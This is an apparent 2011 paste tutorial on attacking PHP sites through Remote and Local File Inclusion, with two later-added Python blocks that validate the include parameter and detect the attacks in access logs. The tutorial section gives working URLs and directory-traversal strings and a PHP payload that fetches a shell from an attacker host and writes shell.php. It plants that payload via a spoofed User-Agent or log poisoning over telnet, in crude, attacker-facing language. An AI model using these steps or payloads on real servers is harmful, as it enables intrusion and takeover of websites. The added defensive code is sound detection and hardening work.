psycholyzern

Untitled

Dec 29th, 2011
This tutorial contains:
-> RFI
-> LFI method 1
-> LFI method 2

First, I will start with the RFI method.

RFI or Remote File Inclusion is a technique which allows you to include a remote file (from a URL) in a webscript.

Let's say we have a website called
Code:
http://www.v1ct1mp4g31337.com/index.php?include=register.php

Now take a look at the part after "index.php?". Do you see that "include=register.php"? This is exactly what we are looking for.

Now try to include Google by typing in
Code:
http://www.v1ct1mp4g31337.com/index.php?include=http://www.google.com

Now, if it displays the Google page, you are able to include remote files. If it gives an error message, jump to the LFI part of the tutorial now.

Well, let's just say it worked and it displays Google. Now we are going to include a shell (you can get one here). Do this by typing this into your URL bar:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=http://www.z0mgh4x0rpage.com/mastershell.txt

WARNING: ALWAYS put your shell in TXT format on your website, otherwise people will be able to access it and F*** with your server!!

Alright, that's it! Now your shell is included and you can rape the victim's webserver.
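Every method on this page works because index.php hands the include parameter straight to include(). As an added example (not code from the paste or from any site it names), this is the validation a defender would put in front of that parameter, written in Python so it runs stand-alone; the allowlist, the page names and the pages directory are assumptions, and the same logic ports directly to PHP.

```python
"""Allowlist validation for an 'include' request parameter.

Added example (not from the original paste). Models the check that belongs
in front of include($_GET['include']). ALLOWED_PAGES and PAGES_DIR are
constructed assumptions; the real allowlist is whatever pages index.php
is meant to load.
"""
import os
import re
from urllib.parse import unquote

ALLOWED_PAGES = {"register.php", "login.php", "home.php"}   # assumption
PAGES_DIR = "/var/www/pages"                                  # assumption

# A URL scheme at the start of the value is the RFI case on this page
# (include=http://...); traversal covers ../../../etc/passwd and
# ../../../proc/self/environ from the two LFI methods.
_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)

def classify(raw):
    """Return 'ok' or a short reason why the parameter value is rejected."""
    value = unquote(unquote(raw))        # undo single and double URL encoding
    if "\x00" in value:
        return "null-byte"               # classic extension-bypass trick
    if _SCHEME.match(value):
        return "remote-url"              # RFI: include=http://...
    if ".." in value or "/" in value or "\\" in value:
        return "traversal"               # LFI: ../ chains, absolute paths
    if value not in ALLOWED_PAGES:
        return "not-allowlisted"         # e.g. shell.php
    return "ok"

def resolve_include(raw, pages_dir=PAGES_DIR):
    """Map a validated parameter to a real path inside pages_dir.

    The realpath containment check is defence in depth: the allowlist
    already rejects anything that is not a bare page name.
    """
    reason = classify(raw)
    if reason != "ok":
        raise ValueError(f"rejected include parameter ({reason}): {raw!r}")
    base = os.path.realpath(pages_dir)
    path = os.path.realpath(os.path.join(base, raw))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved outside the pages directory")
    return path
```

Logging the rejection reason (not the raw value into a page that echoes it) gives the detection side the signal it needs.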

Now we are going for LFI method 1

NOTE: You will need Firefox and its addon Tamper Data to do this method!

LFI or Local File Inclusion allows you to include a local file (which means that the file is stored on the server) and run it in a webscript.

In this method we are going to upload a shell by accessing proc/self/environ.

Now we have our page
Code:
http://www.v1ct1mp4g31337.com/index.php?include=register.php

And now we are going to do this:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=../

If it gives you an error message, this is good. The best thing that can happen is that it says "No such file or directory". But anyway, now add this to your URL:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=../etc/passwd

And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=../etc/passwd
http://www.v1ct1mp4g31337.com/index.php?include=../../etc/passwd
http://www.v1ct1mp4g31337.com/index.php?include=../../../etc/passwd

And so on. Now let's say we got to this URL
Code:
http://www.v1ct1mp4g31337.com/index.php?include=../../../etc/passwd

And we see some huge shitty text we can't make sense of. Now change etc/passwd in the URL to proc/self/environ so it would look like this:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=../../../proc/self/environ

If you see some text, you did good; if you see an error message, you did bad. Now this is the point where we use Tamper Data. Start your Tamper and reload the page, and for the user agent you type in the following PHP script:
PHP Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.

Now simply access your shell by going to
Code:
http://www.v1ct1mp4g31337.com/shell.php

And rape the server.

Now LFI method 2

NOTE: This only works on Apache servers!

Alright, get back to the point where we tried to access etc/passwd. You will do the same method, but not with etc/passwd; you will try to get access to apache/logs/error.log

If you have a brain, you should know how to do that, since it's EXACTLY the same method as for etc/passwd (explained in LFI method 1).

Now when you have found the file, open up cmd and type in
Code:
telnet www.v1ct1mp4g31337.com 80

When you are inside the telnet, you copy the following code (use your own shell URL, of course)
PHP Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

Paste it into the telnet window, and press enter once or maybe twice (until you get an error message).

Now refresh the page in the browser (error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing the following into your browser:

Code:
http://www.v1ct1mp4g31337.com/shell.php
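All three methods leave a distinctive trail in the web server's access log: a URL inside a query parameter, ../ chains ending in etc/passwd or proc/self/environ, a PHP open tag arriving in the User-Agent or in a raw request line, and then a 200 on a freshly dropped shell.php. As an added example (not from the paste), this Python script flags those patterns in Apache combined-format log lines; the log lines, client addresses and rule names are constructed, and the payload text is omitted.

```python
"""Flagging the RFI / LFI / log-poisoning requests this paste walks through.
Added example, not part of the original paste: parses Apache combined-format
access-log lines (constructed samples below, RFC 5737 addresses) and reports
the three methods plus a follow-up hit on the dropped shell.php."""
import re
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>.*)"$')

RULES = [  # checked against the request path plus query string
    ("rfi-remote-include", re.compile(r"[?&][^=&]+=(https?|ftp)://", re.I)),
    ("lfi-traversal", re.compile(r"(\.\.[/\\]|%2e%2e(%2f|/))", re.I)),
    ("lfi-sensitive-file", re.compile(r"(etc/passwd|proc/self/environ|logs?/(error|access)[._]log)", re.I)),
]
PHP_TAG = re.compile(r"<\?(php|=)", re.I)  # PHP open tag in client-controlled data

def detect(line):
    """Rule names one line triggers; the whole line is scanned for a PHP tag
    so a poisoned User-Agent (method 1) and a raw telnet request (method 2)
    are both caught even when the request line does not parse."""
    m = LOG_RE.match(line)
    hits = [name for name, rx in RULES if m and rx.search(m["path"])]
    if PHP_TAG.search(line):
        hits.append("php-tag-in-client-data")
    return hits

def analyse(lines):
    """Per-line findings; once a client has sent PHP code, a later 200 on any
    .php other than index.php from that client is a possible dropped shell."""
    poisoned, report = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        hits = detect(line)
        ip = m["ip"] if m else "?"
        if "php-tag-in-client-data" in hits:
            poisoned.add(ip)
        elif m and ip in poisoned and m["status"] == "200":
            script = m["path"].split("?")[0].lower()
            if script.endswith(".php") and not script.endswith("/index.php"):
                hits.append("possible-dropped-shell")
        if hits:
            report.append((ip, m["path"] if m else line, hits))
    return report

# Constructed sample log: 203.0.113.7 plays the attacker, payload text omitted.
SAMPLE_LOG = [
    '198.51.100.2 - - [29/Dec/2011:10:00:01 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Dec/2011:10:00:05 +0000] "GET /index.php?include=http://www.google.com HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Dec/2011:10:00:09 +0000] "GET /index.php?include=../../../etc/passwd HTTP/1.1" 200 903 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Dec/2011:10:00:14 +0000] "GET /index.php?include=../../../proc/self/environ HTTP/1.1" 200 1377 "-" "<?php /* payload omitted */ ?>"',
    '203.0.113.7 - - [29/Dec/2011:10:00:17 +0000] "<?php /* payload omitted */ ?>" 400 226 "-" "-"',
    '203.0.113.7 - - [29/Dec/2011:10:00:20 +0000] "GET /shell.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Run analyse(SAMPLE_LOG) to see only the attacker's lines reported, with the final shell.php hit tagged as a possible dropped shell; the same rules apply unchanged to error.log entries if the request line is extracted first.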